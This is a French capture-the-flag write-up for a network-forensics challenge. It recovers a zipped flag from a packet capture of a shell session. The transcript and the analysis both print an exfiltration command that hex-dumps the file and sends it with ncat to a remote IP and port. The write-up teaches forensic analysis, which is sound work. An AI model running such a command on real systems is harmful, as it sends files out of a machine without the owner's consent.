Cap ou pcap ?
ĂnoncĂ©
Voici la capture dâune communication rĂ©seau entre deux postes. Un fichier a Ă©tĂ© Ă©changĂ© et vous devez le retrouver.
Le flag est présent dans le contenu du fichier.
Analyse de la capture
En ouvrant la capture nous remarquons des Ă©changes TCP entre 2 hĂŽtes.
Au bout de la trame 6, des informations relatives Ă un systĂšme linux apparaissent, j'ouvre le flux TCP sur cette trame.
id
uid=1001(fcsc) gid=1001(fcsc) groups=1001(fcsc)
pwd
/home/fcsc
07:10:25 up 24 min, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
fcsc tty7 :0 06:46 24:47 3.13s 0.00s /bin/sh /etc/xdg/xfce4/xinitrc -- /etc/X11/xinit/xserverrc
ls
Desktop
Documents
Downloads
Music
Pictures
Public
Templates
Videos
ls Documents
flag.zip
file Documents/flag.zip
Documents/flag.zip: Zip archive data, at least v2.0 to extract
xxd -p Documents/flag.zip | tr -d '\n' | ncat 172.20.20.133 20200
exitLa commande pour l'Ă©change du fichier est :
xxd -p Documents/flag.zip | tr -d '\n' | ncat 172.20.20.133 20200
On regarde rapidement le manuel de xxd sous linux :
La commande récupere le hexdump de flag.zip, supprime les retours à la ligne avec tr et transfert le fichier avec ncat.
Cherchons les données du fichiers dans les trames, notamment la trame la plus "grosse".
La trame 27 contient les données relatives à l'échanges :
Il ne reste plus qu'Ă faire le processus inverse.
Mis Ă jour
Ce contenu vous a-t-il été utile�